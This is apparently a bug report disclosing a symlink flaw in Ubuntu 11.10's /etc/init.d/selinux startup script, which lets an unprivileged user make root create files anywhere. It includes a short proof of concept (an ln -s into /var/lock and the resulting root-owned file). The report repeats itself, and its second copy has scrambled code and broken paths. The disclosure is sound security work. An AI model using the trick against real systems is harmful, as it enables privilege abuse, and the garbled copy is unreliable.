I think there might be a problem with the startup script /etc/init.d/selinux that allows an unprivileged user to create a file in any directory. I am copying a message I sent to Jamie Strandboge -
In my Ubuntu 11.10 (Oneiric), the script /etc/init.d/selinux contains:
statusfile=/.autorelabel
...
lockfile=/var/lock/selinux-relabel
...
# Start only creates the lock
start() { log_daemon_msg "Starting SELinux autorelabel"
if [ -e $statusfile ]; then log_warning_msg "A relabel has already been requested. Please reboot to finish relabeling your system." log_end_msg 0
else /usr/bin/touch $lockfile log_end_msg 0
fi
}
As /var/lock is world writable, a user could presumably create a file in any location by making this a symlink. Admittedly, /var/lock does not persist across reboots (tmpfs), and once selinux-relabel has been created by root it cannot be changed, but if the administrator for example restarts the daemon, in this gap, the user could create the file. I confirmed this to be the case on my machine. Or, if selinux is installed for the first time, then too shall a link be followed if it is pre-created.
Please let me know if further details are required.
To exploit:
When SELinux is not installed or the autorelabel daemon is stopped through e.g., /etc/init.d/selinux stop
unpriv-user$ ln -s /etc/file_to_create /var/lock/selinux-relabel
When /etc/init.d/selinux start happens,
# ls -l /etc/file_to_create
-rw-r--r--. 1 root root 0 2011-10-17 20:29 /etc/file_to_create
Dear All,
I think there might be a problem with the startup script /etc/init.d/selinux that allows an unprivileged user to create a file in any directory. I am copying a message I sent to Jamie Strandboge -
In my Ubuntu 11.10 (Oneiric), the script /etc/init.d/selinux contains:
statusfile= /.autorelabel /var/lock/ selinux- relabel
log_daemon_ msg "Starting SELinux autorelabel"
log_warning_ msg "A relabel has already been requested. Please reboot to finish relabeling your system."
log_end_ msg 0
/usr/ bin/touch $lockfile
log_end_ msg 0
...
lockfile=
...
# Start only creates the lock
start() {
if [ -e $statusfile ]; then
else
fi
}
As /var/lock is world writable, a user could presumably create a file in any location by making this a symlink. Admittedly, /var/lock does not persist across reboots (tmpfs), and once selinux-relabel has been created by root it cannot be changed, but if the administrator for example restarts the daemon, in this gap, the user could create the file. I confirmed this to be the case on my machine. Or, if selinux is installed for the first time, then too shall a link be followed if it is pre-created.
Please let me know if further details are required.
Thanks,
Hayawardh Vijayakumar.
Details:
# lsb_release -rd
Description: Ubuntu 11.10
Release: 11.10
# apt-cache policy selinux us.archive. ubuntu. com/ubuntu/ lucid/universe Packages dpkg/status
Installed: 1:0.9
Candidate: 1:0.9
Version table:
*** 1:0.9 0
500 http://
100 /var/lib/
To exploit: selinux- relabel
When SELinux is not installed or the autorelabel daemon is stopped through e.g., /etc/init.d/selinux stop
unpriv-user$ ln -s /etc/file_to_create /var/lock/
When /etc/init.d/selinux start happens,
# ls -l /etc/file_to_create
-rw-r--r--. 1 root root 0 2011-10-17 20:29 /etc/file_to_create